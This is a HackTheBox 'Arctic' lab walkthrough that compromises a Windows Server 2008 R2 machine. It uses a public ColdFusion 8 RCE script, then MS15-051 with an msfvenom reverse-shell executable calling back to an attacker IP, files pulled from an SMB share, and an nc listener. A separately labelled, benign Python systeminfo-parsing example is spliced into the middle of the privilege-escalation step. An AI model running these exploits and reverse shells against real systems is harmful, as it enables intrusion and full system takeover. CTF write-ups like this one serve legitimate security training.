Arctic
An easy Windows box from HackTheBox, get initial access via known RCE, then elevate privileges with a kernel exploit.
Recon
Running the usual nmap scan:
sudo nmap -sC -sV -oA nmap/init 10.10.10.11
PORT STATE SERVICE VERSION
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
nmap doesn't know what is on port 8500; looking around, it could be a ColdFusion (Macromedia) HTTP server.
Looking at it in the browser confirms it is in fact this ancient server, which takes 30 seconds to respond to each request.
Navigating through the directories also reveals that it is version 8.0.
Exploitation
searchsploit returns a few RCE results; we can pick the Python one:
searchsploit coldfusion
...
Adobe ColdFusion 8 - Remote Command Execution (RCE)
cfm/webapps/50057.py
...
Then mirror it into the working directory:
searchsploit -m cfm/webapps/50057.py
Then edit the file to set lhost to the KALI_IP, and run the exploit to catch a reverse shell:
python3 50057.py
...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49353
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
Run systeminfo, then feed its output to wesng to look for privilege escalation candidates:
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 20/9/2022, 12:39:59 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.983 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.143 MB
Virtual Memory: In Use: 1.142 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
We can see that there are no hotfixes applied at all, so any of the kernel exploits for this build would work for privesc; I opted for MS15-051.
I uploaded the exploit exe to the victim, along with a reverse shell executable made with msfvenom:
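The triage step above (read systeminfo, notice the missing hotfixes and the old kernel version) is what wesng automates. As an added example that is not part of the writeup and not wesng's own code, here is a small Python parser for systeminfo output that pulls out the fields patch triage depends on and flags the two conditions seen on this box. SAMPLE is a constructed, trimmed copy of the output above; treating version 6.1 as out of support is background knowledge, not something the page states.

```python
# Added example: minimal systeminfo parser plus patch-state findings.
# SAMPLE is a constructed, trimmed copy of the Arctic output above.
import re

SAMPLE = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 IP address(es)
                                 [01]: 10.10.10.11
"""

def parse_systeminfo(text):
    """Return top-level 'Key: value' fields as a dict. Indented continuation
    lines (hotfix or NIC entries) are collected as a list under
    '<key> entries' so nothing from the multi-line fields is lost."""
    info, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):            # a new top-level field
            key, _, value = line.partition(":")
            current = key.strip()
            info[current] = value.strip()
        elif current is not None:               # continuation of the last field
            info.setdefault(current + " entries", []).append(line.strip())
    return info

def patch_findings(info):
    """Flag the conditions the writeup relied on: 'Hotfix(s): N/A' means no
    updates at all, and a 6.1 (Windows 7 / Server 2008 R2) kernel is long
    out of support, so kernel privilege escalation should be assumed."""
    findings = []
    if info.get("Hotfix(s)", "").upper() == "N/A":
        findings.append("no hotfixes installed: every post-RTM kernel fix is missing")
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", info.get("OS Version", ""))
    if m and (int(m.group(1)), int(m.group(2))) <= (6, 1):
        findings.append("OS version %s is out of support; kernel privilege "
                        "escalation (e.g. MS15-051) should be assumed" % m.group(0))
    return findings

if __name__ == "__main__":
    for finding in patch_findings(parse_systeminfo(SAMPLE)):
        print("FINDING:", finding)
```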
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe
Set up a listener for the reverse shell:
rlwrap nc -lnvp 9001
And serve the executables with Impacket's smbserver script again:
smbserver.py share .
Then on the victim, change to the TEMP directory and copy them over from the share:
c:\windows\TEMP> copy \\10.10.14.5\share\ms15-051x64.exe ms15-051x64.exe
c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe
And run the exploit, passing the reverse shell executable as its argument:
c:\windows\TEMP> ms15-051x64.exe rev.exe
Check back on the listener:
listening on [any] 9001 ...
...
C:\WINDOWS\Temp>whoami
nt authority\system
And we have root!